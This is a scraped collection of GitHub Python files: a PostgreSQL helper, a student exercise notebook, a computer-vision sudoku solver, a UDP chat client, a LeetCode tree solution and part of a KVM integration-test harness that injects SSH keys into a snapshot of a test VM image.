(NUMBER, POSITIVE, NEGATIVE) VALUES (%s, %s, %s);\"\"\"\n cursor.execute(sql_update_query, (number, positive, negative))\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef get_customer(number):\n try:\n cursor = connection.cursor()\n sql_update_query = \"\"\"SELECT * FROM customers WHERE number = %s;\"\"\"\n cursor.execute(sql_update_query, (number,))\n customer_info = cursor.fetchone()\n return customer_info\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef get_response(number, isPositive):\n try:\n cursor = connection.cursor()\n select_Query = '''SELECT * FROM customers WHERE number=%s;'''\n cursor.execute(select_Query, (number,))\n response = cursor.fetchall()\n return response[-1][isPositive + 1]\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef update_customer_response(number, reply):\n try:\n cursor = connection.cursor()\n sql_update_query = \"\"\"UPDATE customers SET response = %s WHERE number = %s;\"\"\"\n cursor.execute(sql_update_query, (reply, number))\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n return 'hello'\n","repo_name":"blakespencer/Twilio-Docker","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13013398194","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom datetime import datetime\n\n\n# In[ ]:\n\n\n#Question1\n\n\n# In[3]:\n\n\ndef is_date_format_correct(date:str)->bool:\n if len(date) == 10:\n \n if date[4] == '-' and date[7] == '-' :\n if int(date[5:7]) <= 12 and int(date[8:10]) <=31:\n return True\n else:\n 
return False\n \n else:\n return False\n\n\n# In[ ]:\n\n\n#Question2\n\n\n# In[4]:\n\n\nfor i in range(1, 11):\n if i==6:\n continue\n else:\n print(i, end=',')\n\n\n# In[ ]:\n\n\n#Question3\n\n\n# In[7]:\n\n\n\n\ndef getPrevdate(date):\n dict = {1:'Jan', 2:'Feb', 3:'Mar', 4:'Apr', 5:'May', 6:'Jun', 7:'Jul', 8:'Aug', 9:'Sep', 10:'Oct', 11:'Nov', 12:'Dec'}\n \n if int(date[8:10]) == 1:\n if int(date[5:7]) == 1:\n '''date[5:7] - month\n date[:4] -year\n date[8:10] -day\n '''\n\n #make month = 12 ,get the value of a key\n #decrease year by 1\n \n d = 31\n y = int(date[:4])-1\n m = dict[12]\n \n final = str(d)+\" \"+str(m)+\" \"+ date[:4]\n return final\n \n elif int(date[5:7]) > 1:\n tt = int(date[5:7])-1 #month\n #make it equal 30 or 29 or 31 check condition\n \n k = int(date[5:7])\n if (k<=7 and k!=3 and k%2 !=0) or (k>7 and k%2 ==0 ):\n d = 30\n elif (k<=7 and k%2==0) or (k>7 and k%2!=0):\n d = 31\n elif k == 3 and int(date[:4])%4 != 0 :\n d = 28\n elif k == 3 and int(date[:4])%4 == 0 : #leap year take into account\n d = 29\n \n final = str(d)+\" \"+dict[tt]+\" \"+ date[:4]\n return final\n \n elif int(date[8:10]) > 1:\n d = int(date[8:10])-1\n m = dict[int(date[5:7])]\n final = str(d)+\" \"+str(m)+\" \"+ date[:4]\n return final\n \n\ndef compute_prev_date(dates_list:list):\n a = []\n for i in dates_list:\n a.append(getPrevdate(i))\n \n return a\ncompute_prev_date(['2012-03-01', '2022-12-30', '2099-12-21'])\n\n\n# In[ ]:\n\n\n#Question 4\n\n\n# In[21]:\n\n\ndef main():\n qty = None\n cost = None\n\ndef fetch_quantity():\n \"\"\"\n Returns a number, any number\n \"\"\"\n ...\n return ...\n\ndef fetch_cost():\n \"\"\"\n Returns a number, any number\n \"\"\"\n ...\n return ...\n\ndef compute_cost_per_quantity():\n\n qty = fetch_quantity()\n cost = fetch_cost()\n cost_per_quantity = cost/qty\n \n try:\n fetch_cost()\n except:\n pass\n \n #second try except\n try:\n fetch_quantity()\n cost_per_quantity = cost/qty\n \n \n except Exception as e:\n print(e)\n sys.exit(1)\n \n \n return cost_per_quantity\ncost_per_quantity = compute_cost_per_quantity()\na = 1 + 2 + cost_per_quantity\nb = 4 + 5\nprint(a+b)\n\n\n# In[8]:\n\n\n#Question 6\n\n\n# In[12]:\n\n\nclass TestMath:\n \n def __init__(self):\n self.x = 10\n self.y = 10\n\n def test_add(self):\n \n return self.x + self.y\n \n def test_subtract(self):\n \n return self.x - self.y\n \n def test_milutiply(self):\n \n return self.x * self.y\n \nobj = TestMath()\nobj.test_add()\nobj.test_subtract()\nobj.test_milutiply()\n\n","repo_name":"siye-b/PlatinumLife-python-files","sub_path":"Round_I.py","file_name":"Round_I.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33117075659","text":"\"\"\"\r\nChoose picture of sudoku to get its filled solution!\r\n\"\"\"\r\n\r\nimport sys\r\nfrom time import time\r\nfrom argparse import ArgumentParser\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\n\r\n# numeric sudoku solver\r\nfrom sudokusolver import solve\r\nfrom model import MnistClassifier, MNIST_CELL_SIZE, DIGIT_CLASSIFIER_PATH\r\n\r\n\r\nAPP_NAME = \"sudoku\"\r\nSAMPLE_PATH = './images/image_0.jpg'\r\nDEFAULT_INPUT_PATH = './images/image_0.jpg'\r\nDEFAULT_OUTPUT_PATH = './images/solved_0.jpg'\r\nNORMAL_TABLE_SIZE = 1000\r\nBORDER_SIZE = 50\r\n\r\n\r\ndef load_digit_images(filepath):\r\n global DIGITS\r\n digit_model = MnistClassifier()\r\n 
digit_model.load_state_dict(torch.load(DIGIT_CLASSIFIER_PATH))\r\n digit_model.double()\r\n digit_model.eval()\r\n img = cv2.imread(filepath)\r\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\r\n _, tables, _ = search_tables(img)\r\n _, DIGITS = search_digits(tables[0], digit_model, return_digit_images=True)\r\n return\r\n\r\n\r\ndef search_tables(img):\r\n # binarize image\r\n img = cv2.inRange(img, 0, 100)\r\n img = cv2.dilate(img, np.ones((3,3), np.uint8), iterations=1)\r\n\r\n # find big contours and filter them to leave sudoku only\r\n contours, hierarchy = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n areas = [cv2.contourArea(cnt) for cnt in contours]\r\n max_contours_idx = list(np.argsort(areas)[-5:])\r\n sudoku_tables = []\r\n for cnt_idx in max_contours_idx:\r\n n_inside_contours = len(np.argwhere(hierarchy[0].T[3] == cnt_idx).reshape(-1))\r\n if n_inside_contours >= 81 - 3 and n_inside_contours <= 81 + 3:\r\n # filter points in sudoku tables to leave only 4 (?) that define a table\r\n epsilon = 0.01 * cv2.arcLength(contours[cnt_idx], True) \r\n approx_table = cv2.approxPolyDP(contours[cnt_idx], epsilon, True)\r\n if (len(approx_table) >= 4) and (len(approx_table) <= 8):\r\n sudoku_tables.append(approx_table)\r\n \r\n # try to find a sudoku table once again\r\n if len(sudoku_tables) == 0:\r\n k = 1\r\n while k < 10:\r\n cnt_idx = np.argsort(areas)[-k]\r\n epsilon = 0.01 * cv2.arcLength(contours[cnt_idx], True) \r\n approx_table = cv2.approxPolyDP(contours[cnt_idx], epsilon, True)\r\n k += 1\r\n if (len(approx_table) >= 4) and (len(approx_table) <= 20):\r\n sudoku_tables.append(approx_table)\r\n break\r\n \r\n # draw final binary mask: 1 for sudoku tables, 0 otherwise\r\n mask = np.zeros(img.shape)\r\n cv2.fillPoly(mask, sudoku_tables, color=(1, 1, 1))\r\n \r\n # rotate sudoku table to normal square table in points p1 -> (0, 0), p2 -> (R, 0), p3 -> (R, R), p4 -> (0, R)\r\n # derive points in order\r\n for idx, table in enumerate(sudoku_tables):\r\n center = table.mean(axis=0)[0]\r\n p1, p2, p3, p4 = [p[0] for p in table[np.random.choice(len(table), 4, replace=False)]]\r\n for p in table:\r\n if p[0][0] < center[0] and p[0][1] < center[1]:\r\n if p[0][0] + p[0][1] < p1[0] + p1[1]:\r\n p1 = p[0]\r\n elif p[0][0] < center[0] and p[0][1] > center[1]:\r\n p2 = p[0]\r\n elif p[0][0] > center[0] and p[0][1] < center[1]:\r\n p3 = p[0]\r\n elif p[0][0] > center[0] and p[0][1] > center[1]:\r\n if p[0][0] + p[0][1] > p4[0] + p4[1]:\r\n p4 = p[0]\r\n else:\r\n pass\r\n p = [p1, p2, p3, p4]\r\n sudoku_tables[idx] = p\r\n \r\n # final transform\r\n normal_points = np.float32([[0, 0],\r\n [0, NORMAL_TABLE_SIZE],\r\n [NORMAL_TABLE_SIZE, 0], \r\n [NORMAL_TABLE_SIZE, NORMAL_TABLE_SIZE]])\r\n for k in range(len(normal_points)):\r\n normal_points[k] = [normal_points[k][0] + BORDER_SIZE, normal_points[k][1] + BORDER_SIZE]\r\n normal_tables = []\r\n for table in sudoku_tables:\r\n transform = cv2.getPerspectiveTransform(np.float32(table), normal_points)\r\n normal_table = cv2.warpPerspective(img, transform, \r\n (NORMAL_TABLE_SIZE + 2 * BORDER_SIZE, NORMAL_TABLE_SIZE + 2 * BORDER_SIZE))\r\n normal_tables.append(normal_table)\r\n\r\n return mask, normal_tables, sudoku_tables\r\n\r\n\r\ndef search_digits_bad_table(img_table):\r\n size = img_table.shape[0] - 2 * BORDER_SIZE\r\n h = size // 10\r\n step = size // 100\r\n digit_table = [[None for _ in range(9)] for _ in range(9)]\r\n null_pad = 2\r\n null_border = np.pad(np.ones((MNIST_CELL_SIZE - 2 * null_pad, MNIST_CELL_SIZE - 2 * 
null_pad)), pad_width=null_pad)\r\n null_pad_cell = 10\r\n null_border_cell_10 = np.pad(np.ones((h - 2 * null_pad_cell, h - 2 * null_pad_cell)), pad_width=null_pad_cell)\r\n for i in range(9):\r\n for j in range(9):\r\n img_cell = img_table[step * i + h * i + BORDER_SIZE + step // 2 : step * i + h * (i + 1) + BORDER_SIZE + step // 2,\r\n step * j + h * j + BORDER_SIZE + step // 2 : step * j + h * (j + 1) + BORDER_SIZE + step // 2]\r\n img_cell = np.pad(img_cell * null_border_cell_10, pad_width=3)\r\n img_cell = cv2.resize(img_cell, (MNIST_CELL_SIZE, MNIST_CELL_SIZE), interpolation=cv2.INTER_AREA)\r\n digit_table[i][j] = img_cell * null_border \r\n return digit_table\r\n \r\n \r\ndef search_digits_good_table(img_table, cells):\r\n size = img_table.shape[0] - 2 * BORDER_SIZE\r\n moments = [cv2.moments(cnt) for cnt in cells]\r\n cx = [int(m['m10'] / m['m00']) for m in moments]\r\n cy = [int(m['m01'] / m['m00']) for m in moments]\r\n h = size // 10\r\n digit_table = [[None for _ in range(9)] for _ in range(9)]\r\n null_pad = 2\r\n null_border = np.pad(np.ones((MNIST_CELL_SIZE - 2 * null_pad, MNIST_CELL_SIZE - 2 * null_pad)), pad_width=null_pad)\r\n null_pad_cell = 10\r\n null_border_cell_10 = np.pad(np.ones((h - 2 * null_pad_cell, h - 2 * null_pad_cell)), pad_width=null_pad_cell)\r\n null_pad_cell = 20\r\n null_border_cell_20 = np.pad(np.ones((h - 2 * null_pad_cell, h - 2 * null_pad_cell)), pad_width=null_pad_cell)\r\n\r\n for x, y, cell in zip(cx, cy, cells):\r\n i = np.round((x - BORDER_SIZE - (size / 18)) / (size / 9)).astype(int)\r\n j = np.round((y - BORDER_SIZE - (size / 18)) / (size / 9)).astype(int)\r\n img_cell = img_table[x - h // 2 : x + h // 2, y - h // 2 : y + h // 2]\r\n \r\n if np.mean(img_cell * null_border_cell_20) > 10.:\r\n contours, hierarchy = cv2.findContours(np.uint8(img_cell * null_border_cell_10), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n areas = [cv2.contourArea(cnt) for cnt in contours]\r\n digit_idx = np.argsort(areas)[-1]\r\n y_min, x_min, ww, hh = cv2.boundingRect(contours[digit_idx])\r\n step = 2\r\n img_cell = img_table[x - h // 2 + x_min - step : x - h // 2 + x_min + hh + step,\r\n y - h // 2 + y_min - step : y - h // 2 + y_min + ww + step]\r\n img_cell = np.pad(img_cell, pad_width=15)\r\n else:\r\n img_cell = img_cell * null_border_cell_20\r\n img_cell = cv2.resize(img_cell, (MNIST_CELL_SIZE, MNIST_CELL_SIZE), interpolation=cv2.INTER_AREA)\r\n digit_table[i][j] = img_cell * null_border\r\n return digit_table\r\n\r\n \r\ndef search_digits(img_table, digit_model, return_digit_images=False):\r\n size = img_table.shape[0] - 2 * BORDER_SIZE\r\n # find big contours and filter them to leave sudoku only\r\n contours, hierarchy = cv2.findContours(img_table, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n areas = [cv2.contourArea(cnt) for cnt in contours]\r\n table_idx = np.argsort(areas)[-1]\r\n cells = np.array(contours)[np.argwhere(hierarchy[0].T[3] == table_idx).reshape(-1)]\r\n areas_cells = [cv2.contourArea(cnt) for cnt in cells]\r\n cells = cells[np.argwhere((areas_cells > np.median(areas_cells) * 0.9) & \\\r\n (areas_cells < np.median(areas_cells) * 1.1)).reshape(-1)]\r\n if len(cells) == 81:\r\n digit_table = search_digits_good_table(img_table, cells)\r\n else:\r\n digit_table = search_digits_bad_table(img_table)\r\n \r\n for i in range(9):\r\n for j in range(9):\r\n if digit_table[i][j].max() - digit_table[i][j].min() < 255.:\r\n digit_table[i][j] = np.zeros((MNIST_CELL_SIZE, MNIST_CELL_SIZE))\r\n else:\r\n digit_table[i][j] = (digit_table[i][j] - 
np.median(digit_table[i][j])).clip(min=0)\r\n \r\n transform = transforms.Compose(\r\n [transforms.ToTensor(),\r\n transforms.Normalize((0.5,), (0.5,))]\r\n )\r\n digit_images = {}\r\n for i in range(9):\r\n for j in range(9):\r\n img_cell = digit_table[i][j]\r\n if np.mean(img_cell) < 10.:\r\n digit_table[i][j] = -1\r\n else:\r\n img_cell = transform(img_cell / img_cell.max())[None, :]\r\n output = digit_model(img_cell)\r\n \r\n preds, digit = torch.max(output.data, 0)\r\n preds_idx = np.argsort(preds)\r\n if preds_idx[-1] == 5:\r\n if preds[6] / preds[5] > 0.5:\r\n preds_idx[-1] = 6\r\n if preds_idx[-1] == 7:\r\n if preds[1] / preds[7] > 0.5:\r\n preds_idx[-1] = 1\r\n digit_images[int(preds_idx[-1])] = digit_table[i][j]\r\n digit_table[i][j] = preds_idx[-1]\r\n\r\n digit_table = np.array(digit_table, dtype=np.int16)\r\n digit_table = np.where(digit_table == 0, 8, digit_table)\r\n if return_digit_images:\r\n return digit_table, digit_images\r\n return digit_table\r\n\r\n\r\ndef print_solution_to_table(normal_table, digit_table):\r\n sudoku_string = ''\r\n for row in digit_table:\r\n sudoku_row = ' '.join(map(str, row))\r\n sudoku_string += '\\n' + sudoku_row.replace('-1', '?')\r\n\r\n # throws exception if unsolvable in case when the given table is broken\r\n solved_table = next(solve(sudoku_string))\r\n \r\n size = normal_table.shape[0] - 2 * BORDER_SIZE\r\n h = size // 10\r\n step = size // 100\r\n for i in range(9):\r\n for j in range(9):\r\n if digit_table[i][j] == -1:\r\n solution = DIGITS[solved_table[i][j]]\r\n solution = cv2.resize(solution, (h - 2 * step, h - 2 * step), interpolation=cv2.INTER_AREA)\r\n x = step * (i + 1) + h * i + BORDER_SIZE + step // 2\r\n y = step * (j + 1) + h * j + BORDER_SIZE + step // 2\r\n normal_table[x : x + h - 2 * step, y : y + h - 2 * step] = solution\r\n return normal_table\r\n \r\n\r\ndef draw_solution(img, normal_tables, initial_points, mask):\r\n normal_points = np.float32([[0, 0],\r\n [0, NORMAL_TABLE_SIZE],\r\n [NORMAL_TABLE_SIZE, 0], \r\n [NORMAL_TABLE_SIZE, NORMAL_TABLE_SIZE]])\r\n for k in range(len(normal_points)):\r\n normal_points[k] = [normal_points[k][0] + BORDER_SIZE, normal_points[k][1] + BORDER_SIZE]\r\n result = img.copy()\r\n for k in range(len(normal_tables)):\r\n transform = cv2.getPerspectiveTransform(normal_points, np.float32(initial_points[k]))\r\n initial_table = cv2.warpPerspective(normal_tables[k], transform, img.shape[::-1])\r\n result = (result - (initial_table - initial_table.min()) * mask).clip(min=0)\r\n # make black pixels a bit brighter\r\n result[result < 10] = np.random.randint(30, 40, size=result.shape)[result < 10]\r\n result = np.uint8(result)\r\n return result\r\n\r\n \r\ndef draw(img, filepath):\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n mask, normal_tables, initial_points = search_tables(img)\r\n \r\n digit_model = MnistClassifier()\r\n digit_model.load_state_dict(torch.load(DIGIT_CLASSIFIER_PATH))\r\n digit_model.double()\r\n digit_model.eval()\r\n \r\n digits = []\r\n for k, normal_table in enumerate(normal_tables):\r\n digit_table = search_digits(normal_table, digit_model)\r\n try:\r\n normal_table = print_solution_to_table(normal_table, digit_table)\r\n except:\r\n print('Sudoku is unsolvable: unable to detect digits correctly.', file=sys.stderr)\r\n return\r\n digits.append(digit_table)\r\n normal_tables[k] = normal_table\r\n \r\n result = draw_solution(img, normal_tables, initial_points, mask)\r\n result = cv2.cvtColor(result, cv2.COLOR_GRAY2BGR)\r\n # plt.figure(dpi=150)\r\n # plt.imshow(img, 
cmap='gray');\r\n # plt.figure(dpi=150)\r\n # plt.imshow(result, cmap='gray');\r\n cv2.imwrite(filepath, result)\r\n return result\r\n\r\n\r\nDIGITS = {}\r\nload_digit_images(SAMPLE_PATH)\r\n\r\n\r\ndef callback(arguments):\r\n \"\"\"Callback function to process CLI commands\"\"\"\r\n start = time()\r\n image = cv2.imread(arguments.input)\r\n try:\r\n draw(image, arguments.output)\r\n except Exception as e:\r\n print(e)\r\n print(f\"Running time: {time() - start:.3f} seconds.\")\r\n\r\n\r\ndef setup_parser(parser):\r\n \"\"\"Parse commands from CLI\"\"\"\r\n parser.add_argument(\r\n \"-i\", \"--input\",\r\n default=DEFAULT_INPUT_PATH,\r\n help=\"path to input image\",\r\n )\r\n parser.add_argument(\r\n \"-o\", \"--output\",\r\n default=DEFAULT_OUTPUT_PATH,\r\n help=\"path to output image\",\r\n )\r\n parser.set_defaults(callback=callback)\r\n\r\n\r\ndef main():\r\n parser = ArgumentParser(\r\n prog=APP_NAME,\r\n description=\"make a photo of sudoku and get filled solution\",\r\n )\r\n setup_parser(parser)\r\n arguments = parser.parse_args()\r\n arguments.callback(arguments)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"oortur/sudoku-cv","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":13862,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20480356744","text":"import sys\nimport threading\nimport time\nfrom socket import *\n\n\ndef receiver():\n global clist\n while True:\n msg, add = ClientSocket.recvfrom(65565)\n # 0:registration 1:list data 2:chat data 3:keep_alive data 4:unregistration\n op = msg.decode()[0]\n if op == \"1\":\n clist = msg.decode()[1:].split(',')\n elif op == \"2\":\n print(\"From {}\\t[{}]\".format(\n msg.decode()[1:33].strip(), msg.decode()[33:]))\n sys.stdout.flush()\n\n\ndef keep_alive():\n send = \"3\" + Client_ID + (\" \" * (32 - len(Client_ID))) + Private_IP\n while True:\n time.sleep(10)\n ClientSocket.sendto(send.encode(), (Server_IP, 10080))\n\n\ndef get_private():\n tmpsoc = socket(AF_INET, SOCK_DGRAM)\n try:\n tmpsoc.connect(('8.8.8.8', 53))\n ret = tmpsoc.getsockname()[0]\n except:\n ret = '0.0.0.0'\n tmpsoc.close()\n return ret\n\n\nif len(sys.argv) < 3:\n print(\"Error: You need 2 argument through the command line.(Client ID, Server IP)\")\n sys.exit()\n\nclist = []\nClient_ID = sys.argv[1]\nServer_IP = sys.argv[2]\nPrivate_IP = get_private()\nNAT_IP = \"\"\nClientSocket = socket(AF_INET, SOCK_DGRAM)\nClientSocket.bind(('', 10081))\nsend = \"0\" + Client_ID + (\" \" * (32 - len(Client_ID))) + Private_IP\nClientSocket.sendto(send.encode(), (Server_IP, 10080))\nth1 = threading.Thread(target=receiver)\nth1.daemon = True\nth2 = threading.Thread(target=keep_alive)\nth2.daemon = True\nth1.start()\nth2.start()\nwhile True:\n line = input()\n mode = line.split(\" \")[0]\n if mode == \"@show_list\":\n buff = \"\"\n for data in clist:\n tmp = data.split(\" \")\n buff = buff + \"{}\\t{}:{}\\n\".format(tmp[0], tmp[1], tmp[2])\n print(buff)\n sys.stdout.flush()\n elif mode == \"@chat\":\n msg = \" \".join(line.split(\" \")[2:])\n target = line.split(\" \")[1]\n for data in clist:\n tmp = data.split(\" \")\n if target == tmp[0]:\n send = \"2\" + Client_ID + (\" \" * (32 - len(Client_ID))) + msg\n if NAT_IP == \"\":\n for e in clist:\n t = e.split(\" \")\n if t[0] == Client_ID:\n NAT_IP = t[1]\n break\n if NAT_IP == tmp[1]:\n ClientSocket.sendto(send.encode(), (tmp[3], 10081))\n else:\n ClientSocket.sendto(send.encode(), (tmp[1], int(tmp[2])))\n break\n 
elif mode == \"@exit\":\n send = \"4\" + \"unregistration\"\n ClientSocket.sendto(send.encode(), (Server_IP, 10080))\n break\n else:\n print(\"Invalid input.\\n\")\n sys.stdout.flush()\nClientSocket.close()\n","repo_name":"KangInPark/Assignment","sub_path":"Computer Networks/A4/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41964375241","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def buildTree(self, inorder, postorder):\n if len(inorder):\n val = postorder.pop()\n node = TreeNode(val)\n index = inorder.index(val)\n node.right = self.buildTree(inorder[index+1:],postorder)\n node.left = self.buildTree(inorder[0:index],postorder)\n return node\n \n","repo_name":"RahatIbnRafiq/leetcodeProblems","sub_path":"Tree/106. Construct Binary Tree from Inorder and Postorder Traversal.py","file_name":"106. Construct Binary Tree from Inorder and Postorder Traversal.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4137296653","text":"import logging\nimport json\nimport time\nimport os\nimport subprocess\nimport threading\nimport tempfile\nimport time\nimport paramiko\nimport pytest\nimport sys\nfrom novaclient import client\nfrom helper.sshclient import RemoteClient\nfrom . import util\n\n# Define global logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nBIN_DIR = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"bin\")\n\nclass KVM:\n \"\"\"Handle KVM flavour\"\"\"\n\n @classmethod\n def fixture(cls, config):\n\n logger.info(\"Starting KVM integration tests.\")\n\n # We need to validate basic information\n # for 'RemoteClient' object first. Afterwards\n # we can run regular validation\n logger.info(\"Validation starting...\")\n ip = config.get(\"ip\", \"127.0.0.1\")\n logger.info(f\"Using IP {ip} to connect to VM.\")\n port = config.get(\"port\", \"2223\")\n logger.info(f\"Using port tcp/{port} to connect to VM.\")\n\n kvm = KVM(config)\n cls.kvm = kvm \n\n try:\n ssh = RemoteClient(\n host=ip,\n sshconfig=config[\"ssh\"],\n port=port,\n )\n ssh.wait_ssh()\n yield ssh\n\n finally:\n if ssh is not None:\n ssh.disconnect()\n if kvm is not None:\n kvm.__del__()\n\n @classmethod\n def instance(cls):\n return cls.kvm\n\n def __init__(self, config):\n\n # Define self.config\n self.config = config\n # Validate\n ssh_generate, arch = self._validate()\n # Create SSH\n if ssh_generate:\n self._generate_ssh_key()\n else:\n logger.info(\"Using defined SSH key for integration tests.\")\n # Adjust KVM image \n self._adjust_kvm()\n # Start KVM\n self._start_kvm(arch)\n\n\n def __del__(self):\n \"\"\" Cleanup resources held by this object \"\"\"\n if \"keep_running\" in self.config and self.config[\"keep_running\"] == True:\n logger.info(\"Keeping all resources\")\n else:\n self._stop_kvm()\n logger.info(\"Done.\")\n\n def _validate(self):\n \"\"\" Start basic config validation \"\"\"\n # Validate if .raw image is defined\n if not \"image\" in self.config:\n logger.error(\"'image' not defined. Please define path to image.\")\n else:\n logger.info(\"'image' defined. 
Using: {image}\".format(image=self.config[\"image\"]))\n\n # Validate if image extension is defined corretly\n allowed_image_ext = [\n \"raw\",\n \"qcow2\"\n ]\n file_name = os.path.basename(self.config[\"image\"])\n # Get extensions by dot counting in reverse order\n file_ext = file_name.split(\".\")[1:]\n # Join file extension if we have multiple ones (e.g. .tar.gz)\n file_ext = \".\".join(file_ext)\n # Fail on unsupported image types\n if not file_ext in allowed_image_ext:\n msg_err = f\"{file_ext} is not supported for this platform test type.\"\n logger.error(msg_err)\n pytest.exit(msg_err, 1)\n\n # Validate if image is already running\n pid = os.path.exists(\"/tmp/qemu.pid\")\n if pid:\n logger.warning((\"PID file is present. Probably a VM for integrationtest \"+\n \"is already running. This may cause issues for SSH key injection.\"))\n else:\n logger.info(\"No PID file found. We can adjust and start the VM.\")\n\n # Validate target arch\n if \"arch\" in self.config:\n logger.info(\"'arch' is defined. Executing for {arch}\".format(\n arch=self.config[\"arch\"]))\n arch = self.config[\"arch\"]\n else:\n # Setting amd64 as default if not defined\n logger.info(\"'arch' is not defined. Executing for amd64\")\n arch = \"amd64\"\n\n # Validate if VM should remain after tests\n if \"keep_running\" in self.config:\n if self.config[\"keep_running\"]:\n logger.info(\"'keep_running' is true. VM will remain after tests.\")\n else:\n logger.info(\"'keep_running' is false. VM will be terminated after tests.\")\n else:\n logger.info(\"'keep_running' not defined. VM will be terminated after tests.\")\n\n # Validate if SSH key should be generated (default)\n if self.config[\"ssh\"][\"ssh_key_generate\"]:\n logger.info(\"'ssh_key_generate' is true. New random SSH keys will be generated.\")\n # Validate if key files are present on filesystem\n # to avoid overwriting them\n ssh_keys = os.path.exists(self.config[\"ssh\"][\"ssh_key_filepath\"])\n if ssh_keys:\n ssh_generate = False\n logger.error((\"'ssh_key_filepath' is defined and private key is present. \" +\n \"We can NOT safely generate keys without overwriting them.\"))\n else:\n logger.info(\"'ssh_key_filepath' is not defined. We can safely generate keys.\")\n ssh_generate = True\n else:\n logger.info(\"'ssh_key_generate' is false. No SSH keys will be generated.\")\n ssh_generate = False\n\n # Validate if a SSH user is defined\n if not \"user\" in self.config[\"ssh\"]:\n user = \"root\"\n logger.info(\"'user' is not defined. Default user root will be used.\")\n else:\n user = self.config[\"ssh\"][\"user\"]\n logger.info(\"'user' is defined. Using user {user}.\".format(user=user))\n\n return ssh_generate, arch\n\n def _generate_ssh_key(self):\n \"\"\" Generate new SSH key for integration test \"\"\"\n logger.info(\"Generating new SSH key for integration tests.\")\n ssh_key_path = self.config[\"ssh\"][\"ssh_key_filepath\"]\n keyfp = RemoteClient.generate_key_pair(\n filename = ssh_key_path,\n )\n logger.info(\"SSH key for integration tests generated.\")\n\n def _adjust_kvm(self):\n \"\"\" Adjust KVM image and inject needed files \"\"\"\n logger.info(\"Adjusting KVM image. 
This will take some time for each command...\")\n image = self.config[\"image\"]\n image_name = os.path.basename(image)\n ssh_key_path = self.config[\"ssh\"][\"ssh_key_filepath\"]\n ssh_key = os.path.basename(ssh_key_path)\n authorized_keys_file = f\"{ssh_key_path}.pub\"\n sshd_config_src_file = \"integration/misc/sshd_config_integration_tests\"\n sshd_config_dst_file = \"/etc/ssh/sshd_config_integration_tests\"\n sshd_systemd_src_file = \"integration/misc/sshd-integration.test.service\"\n systemd_dst_path = \"/etc/systemd/system/\"\n\n # Command list for adjustments\n cmd_kvm_adj = []\n # Create a snapshot image and inject SSH key\n cmd_kvm_adj.append(\"qemu-img create -f qcow2 -F raw -b {image} /tmp/{image_name}.snapshot.img 2G\".format(\n image=image, image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i mkdir /root/.ssh\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"virt-copy-in -a /tmp/{image_name}.snapshot.img {authorized_keys_file} /root/.ssh/\".format(\n image_name=image_name, authorized_keys_file=authorized_keys_file))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i mv /root/.ssh/{ssh_key}.pub /root/.ssh/test_authorized_keys\".format(\n image_name=image_name, ssh_key=ssh_key))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chown 0 0 /root/.ssh\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chown 0 0 /root/.ssh/test_authorized_keys\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chmod 0700 /root/.ssh\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chmod 0600 /root/.ssh/test_authorized_keys\".format(\n image_name=image_name))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i write-append /etc/hosts.allow 'ALL: 10.\\n'\".format(\n image_name=image_name))\n # Copy custom SSHD config for executing remote integration tests\n # without changing the production sshd_config. 
